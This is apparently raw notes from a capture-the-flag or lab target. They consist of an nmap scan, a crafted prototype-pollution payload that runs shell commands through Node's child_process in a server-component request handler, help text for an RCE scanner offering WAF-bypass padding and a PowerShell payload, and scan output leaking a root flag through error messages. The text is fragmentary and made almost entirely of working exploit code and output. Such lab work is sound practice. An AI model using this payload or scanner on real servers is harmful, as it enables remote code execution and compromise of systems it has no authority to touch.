┌──(root㉿kali)-[~] └─# nmap -p- 192.168.3.164 Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 18:37 CST Nmap scan report for 192.168.3.164 Host is up (0.00049s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp
crafted_chunk = { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": '{"then": "$B0"}', "_response": { "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});", # If you don't need the command output, you can use this line instead: # "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');", "_formData": { "get": "$1:constructor:constructor", }, }, }
optional arguments: -h, --help show this help message and exit -u URL, --url URL Single URL/host to check -l LIST, --list LIST File containing list of hosts (one per line) -t THREADS, --threads THREADS Number of concurrent threads (default: 10) --timeout TIMEOUT Request timeoutin seconds (default: 10) -o OUTPUT, --output OUTPUT Output file for results (JSON format) --all-results Save all results to output file, not just vulnerable hosts -k, --insecure Disable SSL certificate verification -H HEADER, --header HEADER Custom header in'Key: Value' format (can be used multiple times) -v, --verbose Verbose output (show response snippets for vulnerable hosts) -q, --quiet Quiet mode (only show vulnerable hosts) --no-color Disable colored output --safe-check Use safe side-channel detection instead of RCE PoC --windows Use Windows PowerShell payload instead of Unix shell --waf-bypass Add junk data to bypass WAF content inspection (default: 128KB) --waf-bypass-size KB Size of junk data in KB for WAF bypass (default: 128)
[*] Loaded 1 host(s) to scan [*] Using 1 thread(s) [*] Timeout: 10s [*] Using RCE PoC check [!] SSL verification disabled
[ERROR] flag{root-bc29a7159b63b18dc294002be32e1c22} - Connection Error: HTTPSConnectionPool(host='flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d', port=443): Max retries exceeded with url: / (Caused by NameResolutionError("HTTPSConnection(host='flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d', port=443): Failed to resolve 'flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d' ([Errno -2] Name or service not known)"))
============================================================ SCAN SUMMARY ============================================================ Total hosts scanned: 1 Vulnerable: 0 Not vulnerable: 1 Errors: 0 ============================================================
[*] Loaded 1 host(s) to scan [*] Using 1 thread(s) [*] Timeout: 10s [*] Using RCE PoC check [!] SSL verification disabled
[ERROR] To75CuOTHLA7BMmH5Puv - Connection Error: HTTPSConnectionPool(host='to75cuothla7bmmh5puv', port=443): Max retries exceeded with url: / (Caused by NameResolutionError("HTTPSConnection(host='to75cuothla7bmmh5puv', port=443): Failed to resolve 'to75cuothla7bmmh5puv' ([Errno -2] Name or service not known)"))
============================================================ SCAN SUMMARY ============================================================ Total hosts scanned: 1 Vulnerable: 0 Not vulnerable: 1 Errors: 0 ============================================================